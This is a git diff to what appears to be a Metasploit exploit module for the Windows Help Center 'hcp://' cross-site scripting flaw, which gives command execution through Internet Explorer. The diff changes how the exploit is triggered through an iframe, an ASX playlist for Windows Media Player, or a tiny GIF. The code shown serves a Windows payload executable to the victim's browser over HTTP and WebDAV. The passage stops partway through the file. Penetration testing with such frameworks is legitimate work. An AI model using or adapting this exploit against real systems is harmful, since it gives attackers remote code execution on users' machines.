diff --git a/modules/exploits/windows/browser/ms10_xxx_helpctr_xss_cmd_exec.rb b/modules/exploits/windows/browser/ms10_xxx_helpctr_xss_cmd_exec.rb
index 9e724908ce..5c5c0f2d7c 100644
--- a/modules/exploits/windows/browser/ms10_xxx_helpctr_xss_cmd_exec.rb
+++ b/modules/exploits/windows/browser/ms10_xxx_helpctr_xss_cmd_exec.rb
@@ -19,7 +19,6 @@ class Metasploit3 < Msf::Exploit::Remote
#
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
- include Msf::Exploit::CmdStagerVBS
def initialize(info = {})
super(update_info(info,
@@ -30,13 +29,15 @@ class Metasploit3 < Msf::Exploit::Remote
directly via URLs by installing a protocol handler for the scheme "hcp". Due to
an error in validation of input to hcp:// combined with a local cross site
scripting vulnerability and a specialized mechanism to launch the XSS trigger,
- arbitrary command execution can be achieved.
+ arbitrary command execution can be achieved.
- On IE6 and IE7 on XP SP2 or SP3, code execution is automatic. On IE8, a dialog
- box pops, but if WMP9 is installed, WMP9 can be used for automatic execution.
- If IE8 and WMP11, a dialog box will ask the user if execution should continue.
- Automatic detection of these options is implemented in this module, and will
- default to not sending the exploit for IE8/WMP11 unless the option is overridden.
+ On IE7 on XP SP2 or SP3, code execution is automatic. If WMP9 is installed, it
+ can be used to launch the exploit automatically. If IE8 and WMP11, either can
+ be used to launch the attack, but both pop dialog boxes asking the user if
+ execution should continue. This exploit detects if non-intrusive mechanisms are
+ available and will use one if possible. In the case of both IE8 and WMP11, the
+ exploit defaults to using an iframe on IE8, but is configurable by setting the
+ DIALOGMECH option to "none" or "player".
},
'Author' =>
[
@@ -63,20 +64,16 @@ class Metasploit3 < Msf::Exploit::Remote
'Platform' => 'win',
'Targets' =>
[
- [ 'Automatic', { } ], # Only automatic for now.
- #[ 'IE6/IE7', { 'trigger_method' => 'iframe' } ], # Only tested IE7 / XP SP2,3
- #[ 'IE8/WMP9', { 'trigger_method' => 'asx' } ], # untested
- #[ 'IE8/WMP11', { 'trigger_method' => 'asx' } ], # tested, pops dialog box
+ [ 'Automatic', { } ]
],
'DisclosureDate' => 'June 09, 2010',
'DefaultTarget' => 0))
register_options(
[
- #OptString.new( 'CMD', [ true, "The URI-encoded command to execute.", "calc.exe" ]),
- OptBool.new( 'RUNWITHDIALOG', [ true, "Proceed with exploit even if it will pop a dialog to the user?", false]),
OptPort.new( 'SRVPORT', [ true, "The daemon port to listen on", 80 ]),
- OptString.new( 'URIPATH', [ true, "The URI to use.", "/" ])
+ OptString.new( 'URIPATH', [ true, "The URI to use.", "/" ]),
+ OptString.new( 'DIALOGMECH', [ true, "IE8/WMP11 trigger mechanism (none, iframe, or player).", "iframe"])
], self.class)
deregister_options('SSL', 'SSLVersion') # Just for now
@@ -112,16 +109,12 @@ class Metasploit3 < Msf::Exploit::Remote
def process_get(cli, request)
- #print_status("Responding to GET request from #{cli.peerhost}:#{cli.peerport}")
-
@my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
-
webdav_loc = "\\\\#{@my_host}\\#{@random_dir}\\#{@payload}"
-
@url_base = "http://" + @my_host
if (Regexp.new(Regexp.escape(@payload)+'$', true).match(request.uri))
- print_status "GET for payload received."
+ print_status "Sending payload executable to target ..."
return if ((p = regenerate_payload(cli)) == nil)
data = Msf::Util::EXE.to_win32pe(framework, p.encoded)
@@ -130,20 +123,27 @@ class Metasploit3 < Msf::Exploit::Remote
return
end
+ if request.uri.match(/\.gif$/)
+ # "world's smallest gif"
+ data = "GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00!\xF9\x04\x01"
+ data += "\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;"
+ print_status "Sending gif image to WMP at #{cli.peerhost}:#{cli.peerport} ..."
+ send_response(cli, data, { 'Content-TYpe' => 'image/gif' } )
+ end
# ASX Request Inbound
if request.uri.match(/\.asx$/)
asx = %Q|
-
+
|
-#
asx.gsub!(/URLBASE/, @url_base)
asx.gsub!(/STARTHELP/, @random_dir + "/" + @start_help)
- print_status("ASX file requested. Responding to #{cli.peerhost}:#{cli.peerport}...")
+ asx.gsub!(/IMGFILE/, @random_dir + "/" + @img_file)
+ print_status("Sending asx file to #{cli.peerhost}:#{cli.peerport} ...")
send_response(cli, asx, { 'Content-Type' => 'text/html' })
return
end
@@ -152,12 +152,8 @@ class Metasploit3 < Msf::Exploit::Remote
if request.uri.match(/#{@start_help}/)
help_html = %Q|